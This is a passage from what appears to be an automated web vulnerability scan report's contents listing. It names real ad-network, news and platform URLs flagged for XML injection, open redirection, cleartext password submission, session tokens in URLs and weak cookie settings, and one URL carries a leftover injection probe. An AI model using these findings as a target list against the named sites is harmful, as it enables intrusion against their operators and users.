7.47. http://load.exelator.com/crossdomain.xml

7.48. http://log30.doubleverify.com/crossdomain.xml

7.49. http://media.fastclick.net/crossdomain.xml

7.50. http://media2.legacy.com/crossdomain.xml

7.51. http://nai.btrll.com/crossdomain.xml

7.52. http://oas.guardian.co.uk/crossdomain.xml

7.53. http://oasc12.247realmedia.com/crossdomain.xml

7.54. http://optout.collective-media.net/crossdomain.xml

7.55. http://optout.crwdcntrl.net/crossdomain.xml

7.56. http://optout.invitemedia.com:9030/crossdomain.xml

7.57. http://optout.media6degrees.com/crossdomain.xml

7.58. http://p.brilig.com/crossdomain.xml

7.59. http://pbid.pro-market.net/crossdomain.xml

7.60. http://pixel.33across.com/crossdomain.xml

7.61. http://pixel.adsafeprotected.com/crossdomain.xml

7.62. http://pixel.fetchback.com/crossdomain.xml

7.63. http://pixel.quantserve.com/crossdomain.xml

7.64. http://plg3.yumenetworks.com/crossdomain.xml

7.65. http://premiumtv.122.2o7.net/crossdomain.xml

7.66. http://privacy.revsci.net/crossdomain.xml

7.67. http://r.casalemedia.com/crossdomain.xml

7.68. http://r.turn.com/crossdomain.xml

7.69. http://r1-ads.ace.advertising.com/crossdomain.xml

7.70. http://r1.zedo.com/crossdomain.xml

7.71. http://recs.richrelevance.com/crossdomain.xml

7.72. http://req.tidaltv.com/crossdomain.xml

7.73. http://rp.gwallet.com/crossdomain.xml

7.74. http://rs.gwallet.com/crossdomain.xml

7.75. http://s.xp1.ru4.com/crossdomain.xml

7.76. http://s.ytimg.com/crossdomain.xml

7.77. http://s0.2mdn.net/crossdomain.xml

7.78. http://search.spotxchange.com/crossdomain.xml

7.79. http://search.twitter.com/crossdomain.xml

7.80. http://secure-uk.imrworldwide.com/crossdomain.xml

7.81. http://server3.yowindow.com/crossdomain.xml

7.82. http://shadow01.yumenetworks.com/crossdomain.xml

7.83. http://social.ndtv.com/crossdomain.xml

7.84. http://srv.clickfuse.com/crossdomain.xml

7.85. http://swf.yowindow.com/crossdomain.xml

7.86. http://sync.adap.tv/crossdomain.xml

7.87. http://sync.mathtag.com/crossdomain.xml

7.88. http://t.mookie1.com/crossdomain.xml

7.89. http://t4.liverail.com/crossdomain.xml

7.90. http://tags.bluekai.com/crossdomain.xml

7.91. http://trk.tidaltv.com/crossdomain.xml

7.92. http://uav.tidaltv.com/crossdomain.xml

7.93. http://unitus.synergy-e.com/crossdomain.xml

7.94. http://vast.bp3845006.btrll.com/crossdomain.xml

7.95. http://vod.l3.cms.performgroup.com:443/crossdomain.xml

7.96. http://vox-static.liverail.com/crossdomain.xml

7.97. http://www.bangkokpost.com/crossdomain.xml

7.98. http://www.burstnet.com/crossdomain.xml

7.99. http://www.mtv.com/crossdomain.xml

7.100. http://www.ndtv.com/crossdomain.xml

7.101. http://www.nexac.com/crossdomain.xml

7.102. http://www.watchindia.tv/crossdomain.xml

7.103. http://www2.glam.com/crossdomain.xml

7.104. http://www9.effectivemeasure.net/crossdomain.xml

7.105. http://xml.eplayer.performgroup.com/crossdomain.xml

7.106. http://yads.zedo.com/crossdomain.xml

7.107. http://adadvisor.net/crossdomain.xml

7.108. http://ads.masslive.com/crossdomain.xml

7.109. http://ads.mlive.com/crossdomain.xml

7.110. http://ads.oregonlive.com/crossdomain.xml

7.111. http://adscontent2.indiatimes.com/crossdomain.xml

7.112. https://adwords.google.com/crossdomain.xml

7.113. http://api.tweetmeme.com/crossdomain.xml

7.114. http://as.serving-sys.com/crossdomain.xml

7.115. http://cookex.amp.yahoo.com/crossdomain.xml

7.116. http://cricket.iphone.stats.com/crossdomain.xml

7.117. http://developers.facebook.com/crossdomain.xml

7.118. http://ecx.images-amazon.com/crossdomain.xml

7.119. http://fetchback.com/crossdomain.xml

7.120. http://googleads.g.doubleclick.net/crossdomain.xml

7.121. http://images.photogallery.indiatimes.com/crossdomain.xml

7.122. http://login.dotomi.com/crossdomain.xml

7.123. http://netspiderads2.indiatimes.com/crossdomain.xml

7.124. http://netspiderads3.indiatimes.com/crossdomain.xml

7.125. http://open.ad.yieldmanager.net/crossdomain.xml

7.126. http://optimized-by.rubiconproject.com/crossdomain.xml

7.127. http://p.opt.fimserve.com/crossdomain.xml

7.128. http://pagead2.googlesyndication.com/crossdomain.xml

7.129. http://picasaweb.google.com/crossdomain.xml

7.130. http://pubads.g.doubleclick.net/crossdomain.xml

7.131. http://static.ak.fbcdn.net/crossdomain.xml

7.132. http://timesofindia.indiatimes.com/crossdomain.xml

7.133. http://www.adadvisor.net/crossdomain.xml

7.134. http://www.adbrite.com/crossdomain.xml

7.135. http://www.amazon.com/crossdomain.xml

7.136. http://www.connect.facebook.com/crossdomain.xml

7.137. http://www.emirates.com/crossdomain.xml

7.138. http://www.facebook.com/crossdomain.xml

7.139. http://www.fetchback.com/crossdomain.xml

7.140. http://www.godaddy.com/crossdomain.xml

7.141. http://www.jdoqocy.com/crossdomain.xml

7.142. http://www.mid-day.com/crossdomain.xml

7.143. http://www.nationmultimedia.com/crossdomain.xml

7.144. http://www.npr.org/crossdomain.xml

7.145. http://www.ticketmaster.com/crossdomain.xml

7.146. http://www.wtp101.com/crossdomain.xml

7.147. http://www.youtube-nocookie.com/crossdomain.xml

7.148. http://www.youtube.com/crossdomain.xml

7.149. http://www.zigwheels.com/crossdomain.xml

7.150. http://www2.panasonic.com/crossdomain.xml

7.151. http://ads3.bangkokpost.co.th/crossdomain.xml

7.152. http://cricket.widgets.stats.com/crossdomain.xml

7.153. https://docs.google.com/crossdomain.xml

7.154. http://matcher-rbc.bidder7.mookie1.com/crossdomain.xml

7.155. http://twitter.com/crossdomain.xml

7.156. https://twitter.com/crossdomain.xml

7.157. http://weblink.settrade.com/crossdomain.xml

8. Silverlight cross-domain policy

8.1. http://33across.com/clientaccesspolicy.xml

8.2. http://ad-apac.doubleclick.net/clientaccesspolicy.xml

8.3. http://ad.doubleclick.net/clientaccesspolicy.xml

8.4. http://ad4.liverail.com/clientaccesspolicy.xml

8.5. http://b.scorecardresearch.com/clientaccesspolicy.xml

8.6. http://clk.atdmt.com/clientaccesspolicy.xml

8.7. http://dp.33across.com/clientaccesspolicy.xml

8.8. http://pixel.33across.com/clientaccesspolicy.xml

8.9. http://pixel.quantserve.com/clientaccesspolicy.xml

8.10. http://plg3.yumenetworks.com/clientaccesspolicy.xml

8.11. http://premiumtv.122.2o7.net/clientaccesspolicy.xml

8.12. http://s0.2mdn.net/clientaccesspolicy.xml

8.13. http://secure-uk.imrworldwide.com/clientaccesspolicy.xml

8.14. http://shadow01.yumenetworks.com/clientaccesspolicy.xml

8.15. http://t4.liverail.com/clientaccesspolicy.xml

8.16. http://netspiderads3.indiatimes.com/clientaccesspolicy.xml

8.17. http://ts1.mm.bing.net/clientaccesspolicy.xml

8.18. http://ts2.mm.bing.net/clientaccesspolicy.xml

8.19. http://ts3.mm.bing.net/clientaccesspolicy.xml

8.20. http://ts4.mm.bing.net/clientaccesspolicy.xml

8.21. http://adscontent2.indiatimes.com/clientaccesspolicy.xml

8.22. http://choice.atdmt.com/clientaccesspolicy.xml

8.23. http://choice.microsoft.com/clientaccesspolicy.xml

8.24. http://choice.msn.com/clientaccesspolicy.xml

8.25. http://netspiderads2.indiatimes.com/clientaccesspolicy.xml

8.26. http://profile.live.com/clientaccesspolicy.xml

9. Cleartext submission of password

9.1. http://member.bangkokpost.com/login.php

9.2. http://ndtvjobs.bixee.com/search/search/

9.3. http://truehits.net/stat.php

10. XML injection

10.1. http://ad4.liverail.com/util/companions.php [REST URL parameter 1]

10.2. http://ad4.liverail.com/util/companions.php [REST URL parameter 2]

10.3. http://addoer.com/showfixads.php [REST URL parameter 1]

10.4. http://api.facebook.com/restserver.php [format parameter]

10.5. http://api.tweetmeme.com/v2/follow.js [REST URL parameter 2]

10.6. http://cdn.dnaindia.com/images/710/favicon-delicious.ico [REST URL parameter 1]

10.7. http://cdn.dnaindia.com/images/710/favicon-delicious.ico [REST URL parameter 2]

10.8. http://cdn.dnaindia.com/images/710/favicon-delicious.ico [REST URL parameter 3]

10.9. http://cdn.dnaindia.com/images/710/favicon-digg.ico [REST URL parameter 1]

10.10. http://cdn.dnaindia.com/images/710/favicon-digg.ico [REST URL parameter 2]

10.11. http://cdn.dnaindia.com/images/710/favicon-digg.ico [REST URL parameter 3]

10.12. http://cdn.dnaindia.com/images/710/favicon-google-bookmark.ico [REST URL parameter 1]

10.13. http://cdn.dnaindia.com/images/710/favicon-google-bookmark.ico [REST URL parameter 2]

10.14. http://cdn.dnaindia.com/images/710/favicon-google-bookmark.ico [REST URL parameter 3]

10.15. http://cdn.dnaindia.com/images/710/favicon-reddit.ico [REST URL parameter 1]

10.16. http://cdn.dnaindia.com/images/710/favicon-reddit.ico [REST URL parameter 2]

10.17. http://cdn.dnaindia.com/images/710/favicon-reddit.ico [REST URL parameter 3]

10.18. http://cdn.dnaindia.com/images/710/favicon-yahoo-buzz.ico [REST URL parameter 1]

10.19. http://cdn.dnaindia.com/images/710/favicon-yahoo-buzz.ico [REST URL parameter 2]

10.20. http://cdn.dnaindia.com/images/710/favicon-yahoo-buzz.ico [REST URL parameter 3]

10.21. http://load.exelator.com/load/ [REST URL parameter 1]

10.22. http://load.exelator.com/load/OptOut.php [REST URL parameter 1]

10.23. http://load.exelator.com/load/OptOut.php [REST URL parameter 2]

10.24. http://lvs.truehits.in.th/goggen.php [REST URL parameter 1]

10.25. http://media1.bangkokpost.com/ads/Innity/030911TourismMalaysia728x90.html [REST URL parameter 1]

10.26. http://media1.bangkokpost.com/ads/Innity/030911TourismMalaysia728x90.html [REST URL parameter 2]

10.27. http://media1.bangkokpost.com/ads/Innity/030911TourismMalaysia728x90.html [REST URL parameter 3]

10.28. http://media1.bangkokpost.com/ads/Poonphol/140611PoonPholOffice_728x90.swf [REST URL parameter 1]

10.29. http://media1.bangkokpost.com/ads/Poonphol/140611PoonPholOffice_728x90.swf [REST URL parameter 2]

10.30. http://media1.bangkokpost.com/ads/Poonphol/140611PoonPholOffice_728x90.swf [REST URL parameter 3]

10.31. http://media1.bangkokpost.com/ads/house%20ads/030811Epaper_300x250_BP.swf [REST URL parameter 1]

10.32. http://media1.bangkokpost.com/ads/house%20ads/030811Epaper_300x250_BP.swf [REST URL parameter 2]

10.33. http://media1.bangkokpost.com/ads/house%20ads/030811Epaper_300x250_BP.swf [REST URL parameter 3]

10.34. http://media1.bangkokpost.com/ads/raimonland/220811RaimonLand185_300x250_BKP.swf [REST URL parameter 1]

10.35. http://media1.bangkokpost.com/ads/raimonland/220811RaimonLand185_300x250_BKP.swf [REST URL parameter 2]

10.36. http://media1.bangkokpost.com/ads/raimonland/220811RaimonLand185_300x250_BKP.swf [REST URL parameter 3]

10.37. http://media1.bangkokpost.com/ads/turkish_airlines/04052011TurKish_300x250.swf [REST URL parameter 1]

10.38. http://media1.bangkokpost.com/ads/turkish_airlines/04052011TurKish_300x250.swf [REST URL parameter 2]

10.39. http://media1.bangkokpost.com/ads/turkish_airlines/04052011TurKish_300x250.swf [REST URL parameter 3]

10.40. http://pixel.adblade.com/imps.php [REST URL parameter 1]

10.41. http://pixel.adblade.com/log.php [REST URL parameter 1]

10.42. http://pixel.quantserve.com/api/segments.json [REST URL parameter 1]

10.43. http://pixel.quantserve.com/api/segments.json [REST URL parameter 2]

10.44. http://pixel.quantserve.com/optout_set [REST URL parameter 1]

10.45. http://pixel.quantserve.com/optout_status [REST URL parameter 1]

10.46. http://pixel.quantserve.com/optout_verify [REST URL parameter 1]

10.47. http://platform.twitter.com/widgets/images/f.gif [REST URL parameter 1]

10.48. http://platform.twitter.com/widgets/images/f.gif [REST URL parameter 2]

10.49. http://platform.twitter.com/widgets/images/f.gif [REST URL parameter 3]

10.50. http://platform.twitter.com/widgets/images/t.gif [REST URL parameter 1]

10.51. http://platform.twitter.com/widgets/images/t.gif [REST URL parameter 2]

10.52. http://platform.twitter.com/widgets/images/t.gif [REST URL parameter 3]

10.53. http://platform.twitter.com/widgets/tweet_button.html [REST URL parameter 1]

10.54. http://platform.twitter.com/widgets/tweet_button.html [REST URL parameter 2]

10.55. http://req.tidaltv.com/tpas1.aspx [xf parameter]

10.56. http://s.ytimg.com/yt/swfbin/cps-vflNVWyCR.swf [REST URL parameter 2]

10.57. http://s.ytimg.com/yt/swfbin/cps-vflNVWyCR.swf [REST URL parameter 3]

10.58. http://vox-static.liverail.com/swf/v4/adapters/vpaid_adapter.swf [REST URL parameter 1]

10.59. http://vox-static.liverail.com/swf/v4/adapters/vpaid_adapter.swf [REST URL parameter 2]

10.60. http://vox-static.liverail.com/swf/v4/adapters/vpaid_adapter.swf [REST URL parameter 3]

10.61. http://vox-static.liverail.com/swf/v4/adapters/vpaid_adapter.swf [REST URL parameter 4]

10.62. http://vox-static.liverail.com/swf/v4/admanager.swf [REST URL parameter 1]

10.63. http://vox-static.liverail.com/swf/v4/admanager.swf [REST URL parameter 2]

10.64. http://vox-static.liverail.com/swf/v4/admanager.swf [REST URL parameter 3]

10.65. http://web.adblade.com/clicks.php [REST URL parameter 1]

10.66. http://web.adblade.com/impsc.php [REST URL parameter 1]

10.67. http://www.nexac.com/nai_optout.php [REST URL parameter 1]

10.68. http://www.nexac.com/nai_status.php [REST URL parameter 1]

10.69. http://www9.effectivemeasure.net/v4/em4.swf [REST URL parameter 1]

10.70. http://www9.effectivemeasure.net/v4/em4.swf [REST URL parameter 2]

10.71. http://www9.effectivemeasure.net/v4/em_ck_img [REST URL parameter 1]

10.72. http://www9.effectivemeasure.net/v4/em_dimg [REST URL parameter 1]

10.73. http://www9.effectivemeasure.net/v4/em_js [REST URL parameter 1]

11. SSL cookie without secure flag set

11.1. https://twitter.com/home

11.2. https://adwords.google.com/um/StartNewLogin

12. Session token in URL

12.1. http://advertising.aol.com/nai/nai.php

12.2. http://blogs.timesofindia.indiatimes.com/main/page/relatedPostFeed

12.3. http://info.yahoo.com/nai/nai-status.html

12.4. http://info.yahoo.com/nai/optout.html

12.5. http://mc8tdi0ripmbpds25eboaupdulritrp6-a-fc-opensocial.googleusercontent.com/gadgets/evthdlr

12.6. http://mc8tdi0ripmbpds25eboaupdulritrp6-a-fc-opensocial.googleusercontent.com/ps/ifr

12.7. http://nai.ad.us-ec.adtechus.com/nai/daa.php

12.8. http://nai.adserver.adtechus.com/nai/daa.php

12.9. http://nai.adserverec.adtechus.com/nai/daa.php

12.10. http://nai.adserverwc.adtechus.com/nai/daa.php

12.11. http://nai.adsonar.com/nai/daa.php

12.12. http://nai.adtech.de/nai/daa.php

12.13. http://nai.advertising.com/nai/daa.php

12.14. http://nai.glb.adtechus.com/nai/daa.php

12.15. http://nai.tacoda.at.atwola.com/nai/daa.php

12.16. http://www.amazon.com/

12.17. http://www.amazon.com/dp/0307387178

12.18. http://www.amazon.com/dp/B000QRIGLW

12.19. http://www.amazon.com/dp/B002Y27P3M

12.20. http://www.amazon.com/dp/B004DERF5M

12.21. http://www.asaservers.com/showpages.asp

12.22. http://www.facebook.com/extern/login_status.php

12.23. http://www.networkadvertising.org/managing/optout_results.asp

12.24. http://www.networkadvertising.org/yahoo_handler

13. SSL certificate

13.1. https://market.android.com/

13.2. https://adwords.google.com/

13.3. https://asia.citi.com/

13.4. https://docs.google.com/

13.5. https://mail.google.com/

13.6. https://maps-api-ssl.google.com/

13.7. https://sites.google.com/

13.8. https://twitter.com/

13.9. https://www.google.com/

13.10. https://www.gotomeeting.com/

14. Open redirection

14.1. http://a.tribalfusion.com/z/i.optout [success parameter]

14.2. http://a1.interclick.com/CookieCheck.aspx [hasCookies parameter]

14.3. http://a1.interclick.com/optOut.aspx [fail parameter]

14.4. http://clk.atdmt.com/goiframe/171946551/278612752/direct [name of an arbitrarily supplied request parameter]

14.5. http://cmap.am.ace.advertising.com/amcm.ashx [admeld_callback parameter]

14.6. http://i.w55c.net/ping_match.gif [rurl parameter]

14.7. http://ib.adnxs.com/getuid [name of an arbitrarily supplied request parameter]

14.8. http://ib.adnxs.com/getuidnb [name of an arbitrarily supplied request parameter]

14.9. http://ib.adnxs.com/mapuid [redir parameter]

14.10. http://login.dotomi.com/ucm/UCMController [redir_url parameter]

14.11. http://nai.ad.us-ec.adtechus.com/nai/daa.php [rd parameter]

14.12. http://nai.adserver.adtechus.com/nai/daa.php [rd parameter]

14.13. http://nai.adserverec.adtechus.com/nai/daa.php [rd parameter]

14.14. http://nai.adserverwc.adtechus.com/nai/daa.php [rd parameter]

14.15. http://nai.adsonar.com/nai/daa.php [rd parameter]

14.16. http://nai.adtech.de/nai/daa.php [rd parameter]

14.17. http://nai.advertising.com/nai/daa.php [rd parameter]

14.18. http://nai.glb.adtechus.com/nai/daa.php [rd parameter]

14.19. http://nai.tacoda.at.atwola.com/nai/daa.php [rd parameter]

14.20. http://oasc12.247realmedia.com/RealMedia/ads/click_lx.ads/ndtv.com/ROS/L12/1737249030/Top/Martini/Openx_05182011_ron__051811_260/openx_728_leader2.html/4d686437616b356934616b41434d6658 [name of an arbitrarily supplied request parameter]

14.21. http://oasc12.247realmedia.com/RealMedia/ads/click_lx.ads/ndtv.com/ROS/L12/99863551/Top/Martini/Openx_05182011_ron__051811_260/openx_728_leader2.html/4d686437616b354a4f636f41446f5675 [name of an arbitrarily supplied request parameter]

14.22. http://optout.crwdcntrl.net/optout [d parameter]

14.23. http://pixel.quantserve.com/pixel/p-7bFjjs2q00gK6.gif [redirecturl parameter]

14.24. http://privacy.revsci.net/optout/optoutv.aspx [p parameter]

14.25. http://r.pixel.trafficmp.com/a/bpix [r parameter]

14.26. http://s.ixiaa.com/digi/74FD3F27-87A5-4623-80C8-AB4ED16EB84F/a.gif [redirect parameter]

14.27. http://s.ixiaa.com/digi/DE1758AD-D3EC-426B-A4FB-71459A973A0C/a.gif [redirect parameter]

14.28. http://sync.mathtag.com/sync/img [redir parameter]

14.29. http://t.mookie1.com/t/v1/event [migDest parameter]

14.30. http://t4.liverail.com/ [redirect parameter]

14.31. http://www.dnaindia.com/redirect [name of an arbitrarily supplied request parameter]

14.32. http://www.wtp101.com/casale_sync [cm_callback_url parameter]

15. Cookie scoped to parent domain

15.1. http://msite.martiniadnetwork.com/action/track/type/0/pid/1000000986802/sid/1000005169510/loc/http:/www.ndtv.com/article/india/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917/pubclick/Martini/Openx_05182011_ron__051811_260/pos/Top/page/ndtv.com/ROS/L12/ord/1737249030

15.2. http://msite.martiniadnetwork.com/action/track/type/0/pid/1000000986802/sid/1000005169510/loc/http:/www.ndtv.com/article/india6a976">1e77da311f0/48-hours-on-mumbai-airports-main-runway-still-shut-131142/pubclick/Martini/Openx_05182011_ron__051811_260/pos/Top/page/ndtv.com/ROS/L12/ord/99863551

15.3. http://msite.martiniadnetwork.com/index/

15.4. http://optout.mookie1.com/optout/nai/

15.5. http://search.spotxchange.com/vast/2.00/75606

15.6. http://www.amazon.com/

15.7. http://www.amazon.com/b

15.8. http://www.amazon.com/dp/0307387178

15.9. http://www.amazon.com/dp/B000QRIGLW

15.10. http://www.amazon.com/dp/B002Y27P3M

15.11. http://www.amazon.com/dp/B004DERF5M

15.12. http://www.timesjobs.com/candidate/job-search.html

15.13. http://a.collective-media.net/optout

15.14. http://a.netmng.com/opt-out.php

15.15. http://a.rfihub.com/nai_opt_out_1.gif

15.16. http://a.tribalfusion.com/displayAd.js

15.17. http://a.tribalfusion.com/i.optout

15.18. http://a.tribalfusion.com/j.ad

15.19. http://a.tribalfusion.com/z/i.optout

15.20. http://ad.afy11.net/ad

15.21. http://ad.turn.com/server/ads.js

15.22. http://ad.turn.com/server/pixel.htm

15.23. http://ad.wsod.com/

15.24. http://ads.amgdgt.com/ads/opt-out

15.25. http://adstil.indiatimes.com/RealMedia/ads/adstream_lx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/13932048678/x32/OasDefault/3670000929000010THEADVER6209TOIR/Advert1x1Aug15/33323137376236613465363265316130

15.26. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1165705968@Top

15.27. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1324821476@Top

15.28. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1352497994@Right3

15.29. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1679277654@Right1

15.30. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1801219238@Right2

15.31. https://adwords.google.com/um/StartNewLogin

15.32. http://ak1.abmr.net/is/r1-ads.ace.advertising.com

15.33. http://api.aggregateknowledge.com/optout2

15.34. http://api.agkn.com/optout2

15.35. http://as.casalemedia.com/j

15.36. http://ats.tumri.net/ats/optout

15.37. http://avn.innity.com/view/3898/35480/0/1315103295564

15.38. http://b.scorecardresearch.com/b

15.39. http://b.scorecardresearch.com/p

15.40. http://bh.contextweb.com/bh/rtset

15.41. http://bid.openx.net/json

15.42. http://c7.zedo.com/img/bh.gif

15.43. http://cas.criteo.com/delivery/afr.php

15.44. http://clk.atdmt.com/MRT/go/343014976/direct

15.45. http://clk.atdmt.com/goiframe/171946551/278612752/direct

15.46. http://clk.fetchback.com/serve/fb/click

15.47. http://d7.zedo.com/OzoDB/cutils/R53_7/jsc/1302/egc.js

15.48. http://d7.zedo.com/OzoDB/cutils/R53_7/jsc/933/egc.js

15.49. http://d7.zedo.com/OzoDB/cutils/R53_7_5/jsc/767/egc.js

15.50. http://d7.zedo.com/bar/v16-504/d2/jsc/fm.js

15.51. http://d7.zedo.com/bar/v16-504/d2/jsc/fm.js

15.52. http://d7.zedo.com/bar/v16-504/d2/jsc/gl.js

15.53. http://d7.zedo.com/bar/v16-504/d3/jsc/gl.js

15.54. http://d7.zedo.com/bar/v16-504/d8/jsc/fm.js

15.55. http://d7.zedo.com/img/bh.gif

15.56. http://d7.zedo.com/utils/ecSet.js

15.57. http://developers.facebook.com/plugins/

15.58. http://dis.sv.us.criteo.com/dis/dis.aspx

15.59. http://dp.33across.com/ps/

15.60. http://i.w55c.net/ping_match.gif

15.61. http://ib.adnxs.com/ab

15.62. http://ib.adnxs.com/getuid

15.63. http://ib.adnxs.com/getuidnb

15.64. http://ib.adnxs.com/mapuid

15.65. http://ib.adnxs.com/pxj

15.66. http://idcs.interclick.com/Segment.aspx

15.67. http://image2.pubmatic.com/AdServer/Pug

15.68. http://img.pulsemgr.com/optout

15.69. http://imp.fetchback.com/serve/fb/adtag.js

15.70. http://imp.fetchback.com/serve/fb/hover

15.71. http://imp.fetchback.com/serve/fb/imp

15.72. http://load.exelator.com/load/

15.73. http://load.exelator.com/load/

15.74. http://load.exelator.com/load/OptOut.php

15.75. http://nai.btrll.com/nai/optout

15.76. http://notrack.adviva.net/CookieCheck.php

15.77. http://notrack.specificclick.net/CookieCheck.php

15.78. http://notrack.specificmedia.com/CookieCheck.php

15.79. http://oasc12.247realmedia.com/RealMedia/ads/adstream_jx.ads/martinimediainc.com/passback/1937148775@Middle

15.80. http://oasc12.247realmedia.com/RealMedia/ads/adstream_jx.ads/ndtv.com/ROS/1343751177@Top

15.81. http://oasc12.247realmedia.com/RealMedia/ads/adstream_jx.ads/ndtv.com/ROS/1442444284@Top

15.82. http://oasc12.247realmedia.com/RealMedia/ads/adstream_jx.ads/ndtv.com/ROS/1886024182@x96

15.83. http://oasc12.247realmedia.com/RealMedia/ads/adstream_jx.ads/ndtv.com/ROS/1995720457@Top

15.84. http://oasc12.247realmedia.com/RealMedia/ads/adstream_jx.ads/ndtv.com/ROS/1995720457@x96

15.85. http://oo.afy11.net/NAIOptOut.aspx

15.86. http://optimized-by.rubiconproject.com/a/4642/5271/7551-15.js

15.87. http://optout.33across.com/api/

15.88. http://optout.adlegend.com/nai/optout.php

15.89. http://optout.crwdcntrl.net/optout

15.90. http://optout.doubleclick.net/cgi-bin/dclk/optoutnai.pl

15.91. http://optout.imiclk.com/cgi/optout.cgi

15.92. http://optout.mookie1.decdna.net/optout/nai/

15.93. http://optout.mookie1.decideinteractive.com/optout/nai/

15.94. http://optout.mookie1.pm14.com/optout/nai/

15.95. http://optout.mxptint.net/naioptout.ashx

15.96. http://optout.xgraph.net/optout.gif.jsp

15.97. http://p.brilig.com/contact/optout

15.98. http://pbid.pro-market.net/engine

15.99. http://phoenix.untd.com/TRCK/RGST

15.100. http://picasaweb.google.com/lh/view

15.101. http://pixel.33across.com/ps/

15.102. http://pixel.adblade.com/imps.php

15.103. http://pixel.fetchback.com/serve/fb/optout

15.104. http://pixel.quantserve.com/optout_set

15.105. http://pixel.rubiconproject.com/tap.php

15.106. http://pixel.rubiconproject.com/tap.php

15.107. http://pixel.rubiconproject.com/tap.php

15.108. http://pixel.rubiconproject.com/tap.php

15.109. http://pixel.rubiconproject.com/tap.php

15.110. http://pixel.traveladvertising.com/Live/Pixel.aspx

15.111. http://plg3.yumenetworks.com/dynamic_preroll_playlist.vast2xml

15.112. http://premiumtv.122.2o7.net/b/ss/premiumtveplayerUS/0/FAS-3.1.2-AS3/s82023671451024

15.113. http://premiumtv.122.2o7.net/b/ss/premiumtveplayerUS/0/FAS-3.1.2-AS3/s85326054897159

15.114. http://premiumtv.122.2o7.net/b/ss/premiumtveplayerUS/0/FAS-3.1.2-AS3/s8630611889064

15.115. http://premiumtv.122.2o7.net/b/ss/premiumtveplayerUS/0/FAS-3.1.2-AS3/s88864460214972

15.116. http://premiumtv.122.2o7.net/b/ss/premiumtveplayerUS/0/FAS-3.1.2-AS3/s88942754534073

15.117. http://privacy.revsci.net/optout/optout.aspx

15.118. http://profile.live.com/badge

15.119. http://px.owneriq.net/naioptout

15.120. http://r.casalemedia.com/rum

15.121. http://r.openx.net/set

15.122. http://r.pixel.trafficmp.com/a/bpix

15.123. http://r.turn.com/r/bd

15.124. http://r.turn.com/r/beacon

15.125. http://r1-ads.ace.advertising.com/click/site=0000800700/mnum=0000999589/cstr=88962478=_4e62e208,7215437176,800700%5E999589%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=88962478/optn=64

15.126. http://r1-ads.ace.advertising.com/click/site=0000800700/mnum=0000999589/cstr=88962478=_4e62e208,7215437176,800700^999589^1183^0,1_/xsxdata=$xsxdata/bnum=88962478/optn=64

15.127. http://r1-ads.ace.advertising.com/ctst=1/site=804611/size=300250/u=2/bnum=36466465/hr=21/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftimesofindia.indiatimes.com%252Fcity%252Fmumbai%252FMy-friend-Ganesha%252Farticleshow%252F9855193.cms

15.128. http://r1-ads.ace.advertising.com/site=800700/size=300250/u=2/bnum=88962478/hr=21/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftimesofindia.indiatimes.com%252Fcity%252Fmumbai%252FMy-friend-Ganesha%252Farticleshow%252F9855193.cms

15.129. http://r1-ads.ace.advertising.com/site=804611/size=300250/u=2/bnum=36466465/hr=21/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftimesofindia.indiatimes.com%252Fcity%252Fmumbai%252FMy-friend-Ganesha%252Farticleshow%252F9855193.cms

15.130. http://rp.gwallet.com/r1/optout

15.131. http://rs.gwallet.com/r1/pixel/x420r5261063

15.132. http://rs.gwallet.com/r1/pixel/x420r9614074

15.133. http://s.amazon-cornerstone.com/iu3

15.134. http://s.xp1.ru4.com/coop

15.135. http://search.spotxchange.com/partner

15.136. http://srv.clickfuse.com/pixels/create.php

15.137. http://sync.mathtag.com/sync/img

15.138. http://t.mookie1.com/t/v1/event

15.139. http://t4.liverail.com/

15.140. http://tags.bluekai.com/site/2688

15.141. http://tags.bluekai.com/site/353

15.142. http://tap.rubiconproject.com/oz/feeds/invite-media-rtb/tokens/

15.143. http://trk.tidaltv.com/ILogger.aspx

15.144. http://uav.tidaltv.com/3PDPHandler.aspx

15.145. http://www.adadvisor.net/nai/optout

15.146. http://www.adbrite.com/mb/nai_optout.php

15.147. http://www.addthis.com/api/nai/optout

15.148. http://www.bangkokpost.com/classified/ucp.php

15.149. http://www.bangkokpost.com/classified/viewforum.php

15.150. http://www.bangkokpost.com/forum/search.php

15.151. http://www.bizographics.com/nai/optout

15.152. http://www.burstnet.com/cgi-bin/opt_out.cgi

15.153. http://www.facebook.com/campaign/landing.php

15.154. http://www.facebook.com/pages/Friends-of-The-Nation/147232991936

15.155. http://www.google.com/reader/view/

15.156. http://www.mediaplex.com/optout_pure.php

15.157. http://www.mediaplex.com/optout_pure.php

15.158. http://www.nexac.com/nai_optout.php

15.159. http://www.wtp101.com/casale_sync

15.160. http://www.wtp101.com/pull_sync

15.161. http://www.youtube.com/results

15.162. http://www.youtube.com/watch

15.163. http://www9.effectivemeasure.net/v4/em_dimg

15.164. http://www9.effectivemeasure.net/v4/em_js

16. Cookie without HttpOnly flag set

16.1. http://223.165.24.159/toiwidget/jsp/widget.jsp

16.2. http://ad.wsod.com/

16.3. http://nai.ad.us-ec.adtechus.com/nai/daa.php

16.4. http://nai.adserver.adtechus.com/nai/daa.php

16.5. http://nai.adserverec.adtechus.com/nai/daa.php

16.6. http://nai.adserverwc.adtechus.com/nai/daa.php

16.7. http://nai.adsonar.com/nai/daa.php

16.8. http://nai.adtech.de/nai/daa.php

16.9. http://nai.advertising.com/nai/daa.php

16.10. http://nai.glb.adtechus.com/nai/daa.php

16.11. http://nai.tacoda.at.atwola.com/nai/daa.php

